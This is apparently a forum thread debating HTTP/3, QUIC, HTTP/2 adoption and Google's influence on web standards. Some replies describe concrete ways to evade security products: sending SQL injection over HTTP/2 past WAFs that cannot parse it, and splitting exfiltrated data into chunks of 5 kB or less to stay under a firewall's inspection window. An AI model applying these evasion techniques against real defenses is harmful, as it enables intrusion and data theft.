1. 51
  1.  

  2. 10

    Someone should try to squeeze in support for the use of srv records for http/3 too.

    1. 3

      Browsers have pretty soundly rejected using srv records, so that seems DOA.

      1. 4

        Kinda sad because SRV would probably let users host websites at home even if ISPs block port 80.

        1. 1

          The ISPs specifically want to prevent users from hosting websites. If they can’t do that by blocking port 80, they’ll do it some other way.

      2. 2

        One can use the Alt-Svc header instead.

      3. 15

        I had the urge to check if it’s April Fool’s day yet. Web tech is becoming so overcomplicated so quickly it makes me feel burnt out. Besides, HTTP/2 isn’t even widely supported yet, and they expect us to implement HTTP/3 already? Over UDP, of all things?

        1. 4

          I looked it up and about 90% of browsers support HTTP2 (IE before windows 10 was the only one that didn’t) and virtually every web server supports it.

          1. 3

            All three of them? I mean, it’s not like there is a whole lot of diversity in browser engine land.

            As a few random counter-examples, lynx doesn’t seem to support it (note: its underlying libwww library is by the W3C and doesn’t support it!), elinks doesn’t, Dillo doesn’t, Netsurf doesn’t. Even most language HTTP libraries don’t support it (even Python’s Requests library, which is quite active and has lots of contributors doesn’t).

            Note that curl only supports http/2 via an external library because it is such a complex protocol.

            1. 2

              Fun fact: I just discovered that wget doesn’t even support HTTP/1.1, let alone 2.0 :)

          2. 1

            Would the IETF care about if this new protocol is not adopted? Would it consider its position already too strong to care/use this as a deciding factor?

            1. 2

              I do not think it matters much. As long as the big browsers and major servers implement it, that’s enough.

            2. 1

              That’s because HTTP/2 requires https:// protocol scheme, so, unless you’re willing to partake in the political activities, you’re out!

              It looks like HTTP/3 will have integrated encryption, distinct from TLS, but still based on public certificate support. It’s not clear whether or not it’ll require https:// address scheme in order to function — hopefully, not, and they’ll finally address BCP 188.

            3. 15

              Q: is the HTTP protocol really the problem that needs fixing?

              I’m under the belief that if the HTTP overhead is causing you issues then there are many alternative ways to fix this that don’t require more complexity. A site doesn’t load slowly because of HTTP, it loads slowly because it’s poorly designed in other ways.

              I’m also suspicious by Google’s involvement. TCP HTTP 1.1 is very simple to debug and do by hand. Google seems to like closing or controlling open things (Google chat support for XMPP, Google AMP, etc). Extra complexity is something that should be avoided, especially for the open web.

              1. 10

                They have to do the fix on HTTP because massive ecosystems already depend on HTTP and browsers with no intent to switch. There’s billions of dollars riding on staying on that gravy train, too. It’s also worth noting lots of firewalls in big companies let HTTP traffic through but not better-designed protocols. The low-friction improvements get more uptake by IT departments.

                1. 7

                  WAFs and the like barely support HTTP/2 tho; a friend gave a whole talk on bypasses and scanning for it, for example

                  1. 6

                    Thanks for feedback. I’m skimming the talk’s slides right now. So far, it looks like HTTP/2 got big adoption but WAF’s lagged behind. Probably just riding their cash cows minimizing further investment. I’m also sensing business opportunity if anyone wants to build a HTTP/2 and /3 WAF that works with independent testing showing nothing else or others didn’t. Might help bootstrap the company.

                    1. 3

                      ja, that’s exactly correct: lots of the big-name WAFs/NGFWs/&c. are missing support for HTTP/2 but many of the mainline servers support it, so we’ve definitely seen HTTP/2 as a technique to bypass things like SQLi detection, since they don’t bother parsing the protocol.

                      I’ve also definitely considered doing something like CoreRuleSet atop HTTP/2; could be really interesting to release…

                      1. 4

                        so we’ve definitely seen HTTP/2 as a technique to bypass things like SQLi detection, since they don’t bother parsing the protocol.

                        Unbelievable… That shit is why I’m not in the security industry. People mostly building and buying bullshit. There’s exceptions but usually setup to sell out later. Products based on dual-licensed code are about only thing immune to vendor risk. Seemingly. Still exploring hybrid models to root out this kind of BS or force it to change faster.

                        “I’ve also definitely considered doing something like CoreRuleSet atop HTTP/2; could be really interesting to release…”

                        Experiment however you like. I can’t imagine what you release being less effective than web firewalls that can’t even parse the web protocols. Haha.

                        1. 5

                          Products based on dual-licensed code

                          We do this where I work, and it’s pretty nice, tho of course we have certain things that are completely closed source. We have a few competitors that use our products, so it’s been an interesting ecosystem to dive into for me…

                          Experiment however you like. I can’t imagine what you release being less effective than web firewalls that can’t even parse the web protocols. Haha.

                          pfff… there’s a “NGFW” vendor I know that…

                          • when it sees a connection it doesn’t know, analyzes the first 5k bytes
                          • this allows the connection to continue until the 5k+1 byte is met
                          • subsequently, if your exfiltration process transfers data in packages of <= 5kB, you’re ok!

                          we found this during an adversary simulation assessment (“red team”), and I think it’s one of the most asinine things I’ve seen in a while. The vendor closed it as works as expected

                          edit fixed the work link as that’s a known issue.

                          1. 3

                            BTW, Firefox complains when I go to https://trailofbits.com/ that the cert isn’t configured properly…

                            1. 2

                              hahaha Nick and I were just talking about that; its been reported before, I’ll kick it up the chain again. Thanks for that! I probably should edit my post for that…

                              1. 2

                                Adding another data point: latest iOS also complains about the cert

                  2. 3

                    They have to do the fix on HTTP

                    What ‘fix’? Will this benefit anyone other than Google?

                    I’m concerned that if this standard is not actually a worthwhile improvement for everyone else, then it won’t be adopted and IETF will lose respect. I’m running on the guess that’s it’s going to have even less adoption than HTTP2.

                  3. 13

                    I understand and sympathize with your criticism of Google, but it seems misplaced here. This isn’t happening behind closed doors. The IETF is an open forum.

                    1. 6

                      just because they do some subset of the decision making in the open shouldn’t exempt them from blame

                      1. 3

                        Feels like Google’s turned a lot public standards bodies into rubber stamps for pointless-at-best, dangerous-at-worst standards like WebUSB.

                        1. 5

                          Any browser vendor can ship what they want if they think that makes them more attractive to users or what not. Doesn’t mean it’s a standard. WebUSB has shipped in Chrome (and only in Chrome) more than a year ago. The WebUSB spec is still an Editor’s Draft and it seems unlikely to advance significantly along the standards track.

                          The problem is not with the standards bodies, but with user choice, market incentive, blah blah.

                          1. 3

                            Feels like Google’s turned a lot public standards bodies into rubber stamps for pointless-at-best, dangerous-at-worst standards like WebUSB.

                            “WebUSB”? It’s like kuru crossed with ebola. Where do I get off this train.

                          2. 2

                            Google is incapable of doing bad things in an open forum? Open forums cannot be influenced in bad ways?

                            This does not displace my concerns :/ What do you mean exactly?

                            1. 4

                              If the majority of the IETF HTTP WG agrees, I find it rather unlikely that this is going according to a great plan towards “closed things”.

                              Your “things becoming closed-access” argument doesn’t hold, imho: While I have done lots of plain text debugging for HTTP, SMTP, POP and IRC, I can’t agree with it as a strong argument: Whenever debugging gets serious, I go back to writing a script anyway. Also, I really want the web to become encrypted by default (HTTPS). We need “plain text for easy debugging” to go away. The web needs to be great (secure, private, etc.) for users first - engineers second.

                              1. 2

                                That “users first-engineers second” mantra leads to things like Apple and Microsoft clamping down on the “general purpose computer”-think of the children the users! They can’t protect themselves. We’re facing this at work (“the network and computers need to be secure, private, etc) and it’s expected we won’t be able to do any development because of course, upper management doesn’t trust us mere engineers with “general purpose computers”. Why can’t it be for “everybody?” Engineers included?

                                1. 1

                                  No, no, you misunderstand.

                                  The users first / engineers second is not about the engineers as end users like in your desktop computer example.

                                  what I mean derives from the W3C design principles. That is to say, we shouldn’t avoid significant positive change (e.g., HTTPS over HTTP) just because it’s a bit harder on the engineering end.

                                  1. 6

                                    Define “positive change.” Google shoved HTTP/2 down our throats because it serves their interests not ours. Google is shoving QUIC down our throats because again, it serves their interests not ours. That it coincides with your biases is good for you; others might feel differently. What “positive change” does running TCP over TCP give us (HTTP/2)? What “positive change” does a reimplementation of SCTP give us (QUIC)? I mean, other than NIH syndrome?

                                    1. 3

                                      Are you asking what how QUIC and H2 work or are you saying performance isn’t worth improving? If it’s the latter, I think we’ve figured out why we disagree here. If it’s the former, I kindly ask you to find out yourself before you enter this dispute.

                                      1. 3

                                        I know how they work. I’m asking, why are they reimplementing already implemented concepts? I’m sorry, but TCP over TCP (aka HTTP/2) is plain stupid—one lost packet and every stream on that connection hits a brick wall.

                                        1. 1

                                          SPDY and its descendants are designed to allow web pages with lots of resources (namely, images, stylesheets, and scripts) to load quickly. A sizable number of people think that web pages should just not have lots of resources.

                          3. 2

                            Hopefully this breaks every “security” middlebox. I wonder what other kinds of implications this has, I heard that ISPs do funny stuff with UDP packets because they are low priority.

                            1. 7

                              It won’t break middleboxes. Middleboxes were one of the driving forces behind building on top of UDP; I don’t know the details but TCP has some problems that should be fixed but can’t be because any change to TCP would break middleboxes too badly, so TCP is stuck in the past. Ditto to any (new) protocol directly on top of IP that isn’t TCP or UDP.

                              On the bright side, QUIC fixes these issues. QUIC has had a crypto layer since day 1 with the sole, explicit purpose of preventing middleboxes from working.